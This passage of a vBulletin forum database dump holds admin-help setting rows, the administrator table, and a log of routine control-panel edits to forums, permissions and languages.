(4856, 'usergroup', 'add,edit', 'canmanageothersusernotes', 690, 1, 'vbulletin'),
(4857, 'usergroup', 'add,edit', 'canpostothersusernotes', 700, 1, 'vbulletin'),
(4858, 'usergroup', 'add,edit', 'caneditownusernotes', 710, 1, 'vbulletin'),
(4859, 'usergroup', 'add,edit', 'canbeusernoted', 720, 1, 'vbulletin'),
(4860, 'usergroup', 'add,edit', 'ismoderator', 730, 1, 'vbulletin'),
(4861, 'usergroup', 'add,edit', 'cancontrolpanel', 740, 1, 'vbulletin'),
(4862, 'usergroup', 'add,edit', 'cannegativerep', 750, 1, 'vbulletin'),
(4863, 'usergroup', 'add,edit', 'canuserep', 750, 1, 'vbulletin'),
(4864, 'usergroup', 'add,edit', 'canseeownrep', 760, 1, 'vbulletin'),
(4865, 'usergroup', 'add,edit', 'canhiderep', 770, 1, 'vbulletin'),
(4866, 'usergroup', 'add,edit', 'canseeothersrep', 780, 1, 'vbulletin'),
(4867, 'usergroup', 'add,edit', 'sigmaxrawchars', 800, 1, 'vbulletin'),
(4868, 'usergroup', 'add,edit', 'sigmaxchars', 805, 1, 'vbulletin'),
(4869, 'usergroup', 'add,edit', 'sigmaxlines', 810, 1, 'vbulletin'),
(4870, 'usergroup', 'add,edit', 'canbbcode', 815, 1, 'vbulletin'),
(4871, 'usergroup', 'add,edit', 'canbbcodebasic', 815, 1, 'vbulletin'),
(4872, 'usergroup', 'add,edit', 'canbbcodecolor', 820, 1, 'vbulletin'),
(4873, 'usergroup', 'add,edit', 'canbbcodesize', 825, 1, 'vbulletin'),
(4874, 'usergroup', 'add,edit', 'sigmaxsizebbcode', 830, 1, 'vbulletin'),
(4875, 'usergroup', 'add,edit', 'canbbcodefont', 835, 1, 'vbulletin'),
(4876, 'usergroup', 'add,edit', 'canbbcodealign', 840, 1, 'vbulletin'),
(4877, 'usergroup', 'add,edit', 'canbbcodelist', 840, 1, 'vbulletin'),
(4878, 'usergroup', 'add,edit', 'canbbcodelink', 850, 1, 'vbulletin'),
(4879, 'usergroup', 'add,edit', 'canbbcodecode', 855, 1, 'vbulletin'),
(4880, 'usergroup', 'add,edit', 'canbbcodephp', 860, 1, 'vbulletin'),
(4881, 'usergroup', 'add,edit', 'canbbcodehtml', 865, 1, 'vbulletin'),
(4882, 'usergroup', 'add,edit', 'canbbcodequote', 870, 1, 'vbulletin'),
(4883, 'usergroup', 'add,edit', 'allowimg', 875, 1, 'vbulletin'),
(4884, 'usergroup', 'add,edit', 'sigmaximages', 880, 1, 'vbulletin'),
(4885, 'usergroup', 'add,edit', 'allowsmilies', 885, 1, 'vbulletin'),
(4886, 'usergroup', 'add,edit', 'allowhtml', 890, 1, 'vbulletin'),
(4887, 'usergroup', 'add,edit', 'candeleteownmessages', 940, 1, 'vbulletin'),
(4888, 'usergroup', 'add,edit', 'canalbum', 1000, 1, 'vbulletin'),
(4889, 'usergroup', 'add,edit', 'canviewalbum', 1010, 1, 'vbulletin'),
(4890, 'usergroup', 'add,edit', 'albumpicmaxwidth', 1020, 1, 'vbulletin'),
(4891, 'usergroup', 'add,edit', 'albumpicmaxheight', 1030, 1, 'vbulletin'),
(4892, 'usergroup', 'add,edit', 'albummaxpics', 1040, 1, 'vbulletin'),
(4893, 'usergroup', 'add,edit', 'albumpicmaxsize', 1040, 1, 'vbulletin'),
(4894, 'usergroup', 'add,edit', 'albummaxsize', 1050, 1, 'vbulletin'),
(4895, 'usergroup', 'add,edit', 'canpiccomment', 1055, 1, 'vbulletin'),
(4896, 'usergroup', 'add,edit', 'caneditownpiccomment', 1060, 1, 'vbulletin'),
(4897, 'usergroup', 'add,edit', 'candeleteownpiccomment', 1065, 1, 'vbulletin'),
(4898, 'usergroup', 'add,edit', 'canmanagepiccomment', 1070, 1, 'vbulletin'),
(4899, 'usergroup', 'add,edit', 'caneditfontfamily', 1100, 1, 'vbulletin'),
(4900, 'usergroup', 'add,edit', 'caneditfontsize', 1110, 1, 'vbulletin'),
(4901, 'usergroup', 'add,edit', 'caneditcolors', 1120, 1, 'vbulletin'),
(4902, 'usergroup', 'add,edit', 'caneditbgimage', 1130, 1, 'vbulletin'),
(4903, 'usergroup', 'add,edit', 'caneditborders', 1140, 1, 'vbulletin'),
(4904, 'usergroup', 'add,edit', 'cancreategroups', 1210, 1, 'vbulletin'),
(4905, 'usergroup', 'add,edit', 'caneditowngroups', 1220, 1, 'vbulletin'),
(4906, 'usergroup', 'add,edit', 'candeleteowngroups', 1230, 1, 'vbulletin'),
(4907, 'usergroup', 'add,edit', 'canviewgroups', 1240, 1, 'vbulletin'),
(4908, 'usergroup', 'add,edit', 'canmanagemessages', 1250, 1, 'vbulletin'),
(4909, 'usergroup', 'add,edit', 'canpostnonmembergroup', 1260, 1, 'vbulletin'),
(4910, 'usergroup', 'add,edit', 'canmanageowngroups', 1270, 1, 'vbulletin'),
(4911, 'usergroup', 'addleader', '', 1, 1, 'vbulletin'),
(4912, 'usergroup', 'addleader', 'usergroupid', 10, 1, 'vbulletin'),
(4913, 'usergroup', 'addleader', 'username', 20, 1, 'vbulletin'),
(4914, 'usergroup', 'edit', '', 1, 1, 'vbulletin'),
(4915, 'usergroup', 'edit,add', 'canalwayscreatediscussion', 1, 1, 'vbulletin'),
(4916, 'usergroup', 'edit,add', 'canalwayspostmessage', 1, 1, 'vbulletin'),
(4917, 'usergroup', 'edit,add', 'cananimategroupicon', 1, 1, 'vbulletin'),
(4918, 'usergroup', 'edit,add', 'cancreatediscussion', 1, 1, 'vbulletin'),
(4919, 'usergroup', 'edit,add', 'caneditprivacy', 1, 1, 'vbulletin'),
(4921, 'usergroup', 'edit,add', 'cangiveinfraction', 1, 1, 'vbulletin'),
(4922, 'usergroup', 'edit,add', 'canlimitdiscussion', 1, 1, 'vbulletin'),
(4923, 'usergroup', 'edit,add', 'canmanagediscussions', 1, 1, 'vbulletin'),
(4924, 'usergroup', 'edit,add', 'canpostmessage', 1, 1, 'vbulletin'),
(4925, 'usergroup', 'edit,add', 'canreverseinfraction', 1, 1, 'vbulletin'),
(4926, 'usergroup', 'edit,add', 'canseeinfraction', 1, 1, 'vbulletin'),
(4927, 'usergroup', 'edit,add', 'canseethumbnails', 1, 1, 'vbulletin'),
(4928, 'usergroup', 'edit,add', 'canuploadgroupicon', 1, 1, 'vbulletin'),
(4929, 'usergroup', 'edit,add', 'groupiconmaxsize', 1, 1, 'vbulletin'),
(4930, 'usergroup', 'edit,add', 'maximumsocialgroups', 1, 1, 'vbulletin'),
(4931, 'usergroup', 'edit,add', 'pmthrottlequantity', 1, 1, 'vbulletin'),
(4932, 'usergroup', 'edit,add', 'requirehvcheck', 1, 1, 'vbulletin'),
(4933, 'usergroup', 'edit,add', 'canmanageownprofile', 900, 1, 'vbulletin'),
(4934, 'usergroup', 'edit,add', 'canmessageownprofile', 910, 1, 'vbulletin'),
(4935, 'usergroup', 'edit,add', 'canmessageothersprofile', 920, 1, 'vbulletin'),
(4936, 'usergroup', 'edit,add', 'caneditownmessages', 930, 1, 'vbulletin'),
(4937, 'usergroup', 'modify', '', 1, 1, 'vbulletin'),
(4938, 'usergroup', 'modifypromotion', '', 1, 1, 'vbulletin'),
(4939, 'usergroup', 'remove', '', 1, 1, 'vbulletin'),
(4940, 'usergroup', 'removeleader', '', 1, 1, 'vbulletin'),
(4941, 'usergroup', 'removepromotion', '', 1, 1, 'vbulletin'),
(4942, 'usergroup', 'updatepromotion', '', 1, 1, 'vbulletin'),
(4943, 'usergroup', 'updatepromotion', 'usergroupid', 5, 1, 'vbulletin'),
(4944, 'usergroup', 'updatepromotion', 'reputationtype', 10, 1, 'vbulletin'),
(4945, 'usergroup', 'updatepromotion', 'reputation', 20, 1, 'vbulletin'),
(4946, 'usergroup', 'updatepromotion', 'date', 30, 1, 'vbulletin'),
(4947, 'usergroup', 'updatepromotion', 'posts', 40, 1, 'vbulletin'),
(4948, 'usergroup', 'updatepromotion', 'strategy', 50, 1, 'vbulletin'),
(4949, 'usergroup', 'updatepromotion', 'type', 60, 1, 'vbulletin'),
(4950, 'usergroup', 'updatepromotion', 'joinusergroupid', 70, 1, 'vbulletin'),
(4951, 'usergroup', 'viewjoinrequests', '', 1, 1, 'vbulletin'),
(4952, 'usertitle', '', '', 1, 1, 'vbulletin'),
(4953, 'usertitle', 'add', '', 1, 1, 'vbulletin'),
(4954, 'usertitle', 'add,edit', 'title', 10, 1, 'vbulletin'),
(4955, 'usertitle', 'add,edit', 'minposts', 20, 1, 'vbulletin'),
(4956, 'usertitle', 'edit', '', 1, 1, 'vbulletin'),
(4957, 'usertitle', 'modify', '', 1, 1, 'vbulletin'),
(4958, 'usertitle', 'remove', '', 1, 1, 'vbulletin'),
(4959, 'usertools', '', '', 1, 1, 'vbulletin'),
(4960, 'usertools', 'doips', '', 1, 1, 'vbulletin'),
(4961, 'usertools', 'doips', 'ipaddress', 20, 1, 'vbulletin'),
(4962, 'usertools', 'doips', 'username', 30, 1, 'vbulletin'),
(4963, 'usertools', 'doips', 'depth', 40, 1, 'vbulletin'),
(4964, 'usertools', 'domerge', '', 1, 1, 'vbulletin'),
(4965, 'usertools', 'gethost', '', 1, 1, 'vbulletin'),
(4966, 'usertools', 'merge', '', 1, 1, 'vbulletin'),
(4967, 'usertools', 'merge', 'sourceuser', 10, 1, 'vbulletin'),
(4968, 'usertools', 'merge', 'destuser', 20, 1, 'vbulletin'),
(4969, 'usertools', 'pmfolderstats', '', 1, 1, 'vbulletin'),
(4970, 'usertools', 'pmstats', '', 1, 1, 'vbulletin'),
(4971, 'usertools', 'pmuserstats', '', 1, 1, 'vbulletin'),
(4972, 'usertools', 'referrers', '', 1, 1, 'vbulletin'),
(4973, 'usertools', 'referrers', 'startdate', 10, 1, 'vbulletin'),
(4974, 'usertools', 'referrers', 'enddate', 20, 1, 'vbulletin'),
(4975, 'usertools', 'removepms', '', 1, 1, 'vbulletin'),
(4976, 'usertools', 'removesentpms', '', 1, 1, 'vbulletin'),
(4977, 'usertools', 'removesubs', '', 1, 1, 'vbulletin'),
(4978, 'usertools', 'showreferrals', '', 1, 1, 'vbulletin'),
(4979, 'usertools', 'showreferrers', '', 1, 1, 'vbulletin'),
(4980, 'verify', 'intro', '', 1, 1, 'vbulletin'),
(4981, 'verify', 'intro', 'hv_recaptcha_privatekey', 1, 1, 'vbulletin'),
(4982, 'verify', 'intro', 'hv_recaptcha_publickey', 1, 1, 'vbulletin'),
(4983, 'verify', 'intro', 'hv_recaptcha_theme', 1, 1, 'vbulletin'),
(4984, 'verify', 'intro', 'hv_type', 1, 1, 'vbulletin'),
(4985, 'verify', 'intro', 'regimagetype', 1, 1, 'vbulletin'),
(4986, 'verify', 'intro', 'regimageoption', 2, 1, 'vbulletin'),
(4987, 'verify', 'modifyanswer', 'answer', 1, 1, 'vbulletin'),
(4988, 'verify', 'modifyquestion', 'question', 1, 1, 'vbulletin'),
(4989, 'verify', 'modifyquestion', 'regex', 1, 1, 'vbulletin');
DROP TABLE IF EXISTS `administrator`;
CREATE TABLE `administrator` (
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`adminpermissions` int(10) unsigned NOT NULL DEFAULT '0',
`navprefs` mediumtext,
`cssprefs` varchar(250) NOT NULL DEFAULT '',
`notes` mediumtext,
`dismissednews` text,
`languageid` smallint(5) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`userid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `administrator` (`userid`, `adminpermissions`, `navprefs`, `cssprefs`, `notes`, `dismissednews`, `languageid`) VALUES
(1, 491516, NULL, '', NULL, NULL, 0),
(388, 491516, NULL, '', NULL, '', 0);
DROP TABLE IF EXISTS `adminlog`;
CREATE TABLE `adminlog` (
`adminlogid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
`script` varchar(50) NOT NULL DEFAULT '',
`action` varchar(20) NOT NULL DEFAULT '',
`extrainfo` varchar(200) NOT NULL DEFAULT '',
`ipaddress` char(15) NOT NULL DEFAULT '',
PRIMARY KEY (`adminlogid`),
KEY `script_action` (`script`,`action`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `adminlog` (`adminlogid`, `userid`, `dateline`, `script`, `action`, `extrainfo`, `ipaddress`) VALUES
(1, 1, 1420392581, 'options.php', '', '', '46.146.211.11'),
(2, 1, 1420392583, 'options.php', 'options', '', '46.146.211.11'),
(3, 1, 1420392590, 'options.php', 'dooptions', '', '46.146.211.11'),
(4, 1, 1420392592, 'options.php', 'options', '', '46.146.211.11'),
(5, 1, 1420392867, 'options.php', 'dooptions', '', '46.146.211.11'),
(6, 1, 1420392869, 'options.php', 'options', '', '46.146.211.11'),
(7, 1, 1420392873, 'options.php', 'dooptions', '', '46.146.211.11'),
(8, 1, 1420392874, 'options.php', 'options', '', '46.146.211.11'),
(9, 1, 1420393310, 'forum.php', 'modify', '', '46.146.211.11'),
(10, 1, 1420393315, 'forum.php', 'edit', 'forum id = 1', '46.146.211.11'),
(11, 1, 1420393328, 'forum.php', 'update', 'forum id = 1', '46.146.211.11'),
(12, 1, 1420393329, 'forum.php', 'modify', 'forum id = 1', '46.146.211.11'),
(13, 1, 1420393332, 'forum.php', 'edit', 'forum id = 2', '46.146.211.11'),
(14, 1, 1420393340, 'forum.php', 'update', 'forum id = 2', '46.146.211.11'),
(15, 1, 1420393342, 'forum.php', 'modify', 'forum id = 2', '46.146.211.11'),
(16, 1, 1420393348, 'forum.php', 'add', '', '46.146.211.11'),
(17, 1, 1420393380, 'forum.php', 'modify', 'forum id = 2', '46.146.211.11'),
(18, 1, 1420393382, 'forum.php', 'add', '', '46.146.211.11'),
(19, 1, 1420393386, 'forum.php', 'update', '', '46.146.211.11'),
(20, 1, 1420393388, 'forum.php', 'modify', 'forum id = 3', '46.146.211.11'),
(21, 1, 1420393392, 'forum.php', 'edit', 'forum id = 3', '46.146.211.11'),
(22, 1, 1420393409, 'forum.php', 'update', 'forum id = 3', '46.146.211.11'),
(23, 1, 1420393413, 'forum.php', 'modify', 'forum id = 3', '46.146.211.11'),
(24, 1, 1420393418, 'forum.php', 'add', '', '46.146.211.11'),
(25, 1, 1420393422, 'forum.php', 'update', '', '46.146.211.11'),
(26, 1, 1420393423, 'forum.php', 'modify', 'forum id = 4', '46.146.211.11'),
(27, 1, 1420393427, 'forum.php', 'add', '', '46.146.211.11'),
(28, 1, 1420393436, 'forum.php', 'update', '', '46.146.211.11'),
(29, 1, 1420393437, 'forum.php', 'modify', 'forum id = 5', '46.146.211.11'),
(30, 1, 1420393447, 'forum.php', 'add', '', '46.146.211.11'),
(31, 1, 1420393451, 'forum.php', 'update', '', '46.146.211.11'),
(32, 1, 1420393453, 'forum.php', 'modify', 'forum id = 6', '46.146.211.11'),
(33, 1, 1420393472, 'forum.php', 'add', '', '46.146.211.11'),
(34, 1, 1420393476, 'forum.php', 'update', '', '46.146.211.11'),
(35, 1, 1420393477, 'forum.php', 'modify', 'forum id = 7', '46.146.211.11'),
(36, 1, 1420393497, 'forum.php', 'edit', 'forum id = 3', '46.146.211.11'),
(37, 1, 1420393515, 'forum.php', 'update', 'forum id = 3', '46.146.211.11'),
(38, 1, 1420393520, 'forum.php', 'modify', 'forum id = 3', '46.146.211.11'),
(39, 1, 1420393534, 'forum.php', 'edit', 'forum id = 3', '46.146.211.11'),
(40, 1, 1420393580, 'forum.php', 'modify', 'forum id = 3', '46.146.211.11'),
(41, 1, 1420393592, 'forum.php', 'edit', 'forum id = 1', '46.146.211.11'),
(42, 1, 1420393624, 'forum.php', 'add', '', '46.146.211.11'),
(43, 1, 1420393630, 'forum.php', 'update', '', '46.146.211.11'),
(44, 1, 1420393631, 'forum.php', 'modify', 'forum id = 8', '46.146.211.11'),
(45, 1, 1420393636, 'forum.php', 'add', '', '46.146.211.11'),
(46, 1, 1420393645, 'forum.php', 'update', '', '46.146.211.11'),
(47, 1, 1420393646, 'forum.php', 'modify', 'forum id = 9', '46.146.211.11'),
(48, 1, 1420393655, 'forum.php', 'add', '', '46.146.211.11'),
(49, 1, 1420393658, 'forum.php', 'update', '', '46.146.211.11'),
(50, 1, 1420393659, 'forum.php', 'modify', 'forum id = 10', '46.146.211.11'),
(51, 1, 1420393671, 'forum.php', 'add', '', '46.146.211.11'),
(52, 1, 1420393674, 'forum.php', 'update', '', '46.146.211.11'),
(53, 1, 1420393677, 'forum.php', 'modify', 'forum id = 11', '46.146.211.11'),
(54, 1, 1420393681, 'forum.php', 'add', '', '46.146.211.11'),
(55, 1, 1420393685, 'forum.php', 'modify', 'forum id = 11', '46.146.211.11'),
(56, 1, 1420393692, 'forum.php', 'add', '', '46.146.211.11'),
(57, 1, 1420393695, 'forum.php', 'update', '', '46.146.211.11'),
(58, 1, 1420393697, 'forum.php', 'modify', 'forum id = 12', '46.146.211.11'),
(59, 1, 1420393704, 'forum.php', 'add', '', '46.146.211.11'),
(60, 1, 1420393715, 'forum.php', 'modify', 'forum id = 12', '46.146.211.11'),
(61, 1, 1420393718, 'forum.php', 'add', '', '46.146.211.11'),
(62, 1, 1420393744, 'forum.php', 'modify', '', '46.146.211.11'),
(63, 1, 1420393746, 'forum.php', 'add', '', '46.146.211.11'),
(64, 1, 1420393752, 'forum.php', 'update', '', '46.146.211.11'),
(65, 1, 1420393753, 'forum.php', 'modify', 'forum id = 13', '46.146.211.11'),
(66, 1, 1420393758, 'forum.php', 'add', '', '46.146.211.11'),
(67, 1, 1420393763, 'forum.php', 'update', '', '46.146.211.11'),
(68, 1, 1420393765, 'forum.php', 'modify', 'forum id = 14', '46.146.211.11'),
(69, 1, 1420393779, 'forum.php', 'add', '', '46.146.211.11'),
(70, 1, 1420393786, 'forum.php', 'update', '', '46.146.211.11'),
(71, 1, 1420393787, 'forum.php', 'modify', 'forum id = 15', '46.146.211.11'),
(72, 1, 1420393795, 'forum.php', 'edit', 'forum id = 3', '46.146.211.11'),
(73, 1, 1420393813, 'forum.php', 'update', 'forum id = 3', '46.146.211.11'),
(74, 1, 1420393817, 'forum.php', 'modify', 'forum id = 3', '46.146.211.11'),
(75, 1, 1420393820, 'forum.php', 'edit', 'forum id = 6', '46.146.211.11'),
(76, 1, 1420393828, 'forum.php', 'update', 'forum id = 6', '46.146.211.11'),
(77, 1, 1420393831, 'forum.php', 'modify', 'forum id = 6', '46.146.211.11'),
(78, 1, 1420393836, 'forum.php', 'edit', 'forum id = 8', '46.146.211.11'),
(79, 1, 1420393846, 'forum.php', 'update', 'forum id = 8', '46.146.211.11'),
(80, 1, 1420393848, 'forum.php', 'modify', 'forum id = 8', '46.146.211.11'),
(81, 1, 1420393854, 'forum.php', 'edit', 'forum id = 10', '46.146.211.11'),
(82, 1, 1420393859, 'forum.php', 'update', 'forum id = 10', '46.146.211.11'),
(83, 1, 1420393860, 'forum.php', 'modify', 'forum id = 10', '46.146.211.11'),
(84, 1, 1420393868, 'forum.php', 'edit', 'forum id = 13', '46.146.211.11'),
(85, 1, 1420393873, 'forum.php', 'update', 'forum id = 13', '46.146.211.11'),
(86, 1, 1420393874, 'forum.php', 'modify', 'forum id = 13', '46.146.211.11'),
(87, 1, 1420394080, 'forum.php', 'doorder', '', '46.146.211.11'),
(88, 1, 1420394082, 'forum.php', 'modify', '', '46.146.211.11'),
(89, 1, 1420394099, 'forumpermission.php', 'modify', '', '46.146.211.11'),
(90, 1, 1420394105, 'forumpermission.php', 'quickset', 'forum id = 1', '46.146.211.11'),
(91, 1, 1420394107, 'forumpermission.php', 'modify', 'forum id = 1', '46.146.211.11'),
(92, 1, 1420394111, 'forumpermission.php', 'quickset', 'forum id = 3', '46.146.211.11'),
(93, 1, 1420394112, 'forumpermission.php', 'modify', 'forum id = 3', '46.146.211.11'),
(94, 1, 1420394114, 'forumpermission.php', 'quickset', 'forum id = 6', '46.146.211.11'),
(95, 1, 1420394116, 'forumpermission.php', 'modify', 'forum id = 6', '46.146.211.11'),
(96, 1, 1420394118, 'forumpermission.php', 'quickset', 'forum id = 8', '46.146.211.11'),
(97, 1, 1420394119, 'forumpermission.php', 'modify', 'forum id = 8', '46.146.211.11'),
(98, 1, 1420394123, 'forumpermission.php', 'quickset', 'forum id = 10', '46.146.211.11'),
(99, 1, 1420394124, 'forumpermission.php', 'modify', 'forum id = 10', '46.146.211.11'),
(100, 1, 1420394127, 'forumpermission.php', 'quickset', 'forum id = 13', '46.146.211.11'),
(101, 1, 1420394128, 'forumpermission.php', 'modify', 'forum id = 13', '46.146.211.11'),
(102, 1, 1420394138, 'forumpermission.php', 'edit', 'forumpermission id = 6', '46.146.211.11'),
(103, 1, 1420394152, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(104, 1, 1420394153, 'forumpermission.php', 'modify', 'forum id = 1', '46.146.211.11'),
(105, 1, 1420394156, 'forumpermission.php', 'edit', 'forumpermission id = 6', '46.146.211.11'),
(106, 1, 1420394161, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(107, 1, 1420394165, 'forumpermission.php', 'modify', 'forum id = 1', '46.146.211.11'),
(108, 1, 1420394194, 'forumpermission.php', 'modify', '', '46.146.211.11'),
(109, 1, 1420394201, 'forumpermission.php', 'edit', 'forumpermission id = 7', '46.146.211.11'),
(110, 1, 1420394205, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(111, 1, 1420394206, 'forumpermission.php', 'modify', 'forum id = 1', '46.146.211.11'),
(112, 1, 1420394210, 'forumpermission.php', 'edit', 'forumpermission id = 2', '46.146.211.11'),
(113, 1, 1420394213, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(114, 1, 1420394214, 'forumpermission.php', 'modify', 'forum id = 1', '46.146.211.11'),
(115, 1, 1420394217, 'forumpermission.php', 'edit', 'forumpermission id = 5', '46.146.211.11'),
(116, 1, 1420394221, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(117, 1, 1420394222, 'forumpermission.php', 'modify', 'forum id = 1', '46.146.211.11'),
(118, 1, 1420394234, 'forumpermission.php', 'edit', 'forumpermission id = 14', '46.146.211.11'),
(119, 1, 1420394237, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(120, 1, 1420394238, 'forumpermission.php', 'modify', 'forum id = 3', '46.146.211.11'),
(121, 1, 1420394242, 'forumpermission.php', 'edit', 'forumpermission id = 15', '46.146.211.11'),
(122, 1, 1420394245, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(123, 1, 1420394246, 'forumpermission.php', 'modify', 'forum id = 3', '46.146.211.11'),
(124, 1, 1420394248, 'forumpermission.php', 'edit', 'forumpermission id = 10', '46.146.211.11'),
(125, 1, 1420394251, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(126, 1, 1420394252, 'forumpermission.php', 'modify', 'forum id = 3', '46.146.211.11'),
(127, 1, 1420394255, 'forumpermission.php', 'edit', 'forumpermission id = 13', '46.146.211.11'),
(128, 1, 1420394257, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(129, 1, 1420394258, 'forumpermission.php', 'modify', 'forum id = 3', '46.146.211.11'),
(130, 1, 1420394267, 'forumpermission.php', 'edit', 'forumpermission id = 22', '46.146.211.11'),
(131, 1, 1420394270, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(132, 1, 1420394271, 'forumpermission.php', 'modify', 'forum id = 6', '46.146.211.11'),
(133, 1, 1420394277, 'forumpermission.php', 'edit', 'forumpermission id = 18', '46.146.211.11'),
(134, 1, 1420394279, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(135, 1, 1420394280, 'forumpermission.php', 'modify', 'forum id = 6', '46.146.211.11'),
(136, 1, 1420394285, 'forumpermission.php', 'edit', 'forumpermission id = 21', '46.146.211.11'),
(137, 1, 1420394287, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(138, 1, 1420394288, 'forumpermission.php', 'modify', 'forum id = 6', '46.146.211.11'),
(139, 1, 1420394294, 'forumpermission.php', 'edit', 'forumpermission id = 23', '46.146.211.11'),
(140, 1, 1420394297, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(141, 1, 1420394298, 'forumpermission.php', 'modify', 'forum id = 6', '46.146.211.11'),
(142, 1, 1420394309, 'forumpermission.php', 'edit', 'forumpermission id = 30', '46.146.211.11'),
(143, 1, 1420394312, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(144, 1, 1420394313, 'forumpermission.php', 'modify', 'forum id = 8', '46.146.211.11'),
(145, 1, 1420394318, 'forumpermission.php', 'edit', 'forumpermission id = 31', '46.146.211.11'),
(146, 1, 1420394321, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(147, 1, 1420394322, 'forumpermission.php', 'modify', 'forum id = 8', '46.146.211.11'),
(148, 1, 1420394325, 'forumpermission.php', 'edit', 'forumpermission id = 26', '46.146.211.11'),
(149, 1, 1420394327, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(150, 1, 1420394328, 'forumpermission.php', 'modify', 'forum id = 8', '46.146.211.11'),
(151, 1, 1420394331, 'forumpermission.php', 'edit', 'forumpermission id = 29', '46.146.211.11'),
(152, 1, 1420394334, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(153, 1, 1420394338, 'forumpermission.php', 'modify', 'forum id = 8', '46.146.211.11'),
(154, 1, 1420394343, 'forumpermission.php', 'edit', 'forumpermission id = 38', '46.146.211.11'),
(155, 1, 1420394346, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(156, 1, 1420394347, 'forumpermission.php', 'modify', 'forum id = 10', '46.146.211.11'),
(157, 1, 1420394350, 'forumpermission.php', 'edit', 'forumpermission id = 39', '46.146.211.11'),
(158, 1, 1420394353, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(159, 1, 1420394354, 'forumpermission.php', 'modify', 'forum id = 10', '46.146.211.11'),
(160, 1, 1420394358, 'forumpermission.php', 'edit', 'forumpermission id = 34', '46.146.211.11'),
(161, 1, 1420394360, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(162, 1, 1420394361, 'forumpermission.php', 'modify', 'forum id = 10', '46.146.211.11'),
(163, 1, 1420394364, 'forumpermission.php', 'edit', 'forumpermission id = 37', '46.146.211.11'),
(164, 1, 1420394367, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(165, 1, 1420394368, 'forumpermission.php', 'modify', 'forum id = 10', '46.146.211.11'),
(166, 1, 1420394371, 'forumpermission.php', 'edit', 'forumpermission id = 46', '46.146.211.11'),
(167, 1, 1420394374, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(168, 1, 1420394375, 'forumpermission.php', 'modify', 'forum id = 13', '46.146.211.11'),
(169, 1, 1420394378, 'forumpermission.php', 'edit', 'forumpermission id = 47', '46.146.211.11'),
(170, 1, 1420394381, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(171, 1, 1420394382, 'forumpermission.php', 'modify', 'forum id = 13', '46.146.211.11'),
(172, 1, 1420394384, 'forumpermission.php', 'edit', 'forumpermission id = 42', '46.146.211.11'),
(173, 1, 1420394387, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(174, 1, 1420394388, 'forumpermission.php', 'modify', 'forum id = 13', '46.146.211.11'),
(175, 1, 1420394390, 'forumpermission.php', 'edit', 'forumpermission id = 45', '46.146.211.11'),
(176, 1, 1420394392, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(177, 1, 1420394395, 'forumpermission.php', 'modify', 'forum id = 13', '46.146.211.11'),
(178, 1, 1420394985, 'thread.php', 'prune', '', '46.146.211.11'),
(179, 1, 1420395387, 'user.php', 'add', '', '46.146.211.11'),
(180, 1, 1420395450, 'user.php', 'update', '', '46.146.211.11'),
(181, 1, 1420395451, 'user.php', 'modify', 'user id = 101', '46.146.211.11'),
(182, 1, 1420395577, 'forum.php', 'modify', '', '46.146.211.11'),
(183, 1, 1420395730, 'forum.php', 'doorder', '', '46.146.211.11'),
(184, 1, 1420395734, 'forum.php', 'modify', '', '46.146.211.11'),
(185, 1, 1420395875, 'language.php', 'files', '', '46.146.211.11'),
(186, 1, 1420395924, 'language.php', 'upload', '', '46.146.211.11'),
(187, 1, 1420395925, 'language.php', 'rebuild', '', '46.146.211.11'),
(188, 1, 1420395933, 'language.php', '', '', '46.146.211.11'),
(189, 1, 1420395985, 'language.php', 'edit_settings', 'Language ID = 2', '46.146.211.11'),
(190, 1, 1420395990, 'language.php', 'update_settings', 'Language ID = 2', '46.146.211.11'),
(191, 1, 1420395994, 'language.php', 'setdefault', 'Language ID = 2', '46.146.211.11'),
(192, 1, 1420396027, 'language.php', 'edit_settings', 'Language ID = 1', '46.146.211.11'),
(193, 1, 1420396030, 'language.php', 'update_settings', 'Language ID = 1', '46.146.211.11'),
(194, 1, 1420396031, 'language.php', 'setdefault', 'Language ID = 1', '46.146.211.11'),
(195, 1, 1420396288, 'forum.php', 'modify', '', '46.146.211.11'),
(196, 1, 1420396291, 'forum.php', 'edit', 'forum id = 1', '46.146.211.11'),
(197, 1, 1420396292, 'forum.php', 'modify', '', '46.146.211.11'),
(198, 1, 1420396294, 'forum.php', 'edit', 'forum id = 2', '46.146.211.11'),
(199, 1, 1420396298, 'forum.php', 'update', 'forum id = 2', '46.146.211.11'),
(200, 1, 1420396299, 'forum.php', 'modify', 'forum id = 2', '46.146.211.11'),
(201, 1, 1420396301, 'forum.php', 'edit', 'forum id = 4', '46.146.211.11'),
(202, 1, 1420396305, 'forum.php', 'update', 'forum id = 4', '46.146.211.11'),
(203, 1, 1420396309, 'forum.php', 'modify', 'forum id = 4', '46.146.211.11'),
(204, 1, 1420396336, 'forum.php', 'edit', 'forum id = 7', '46.146.211.11'),
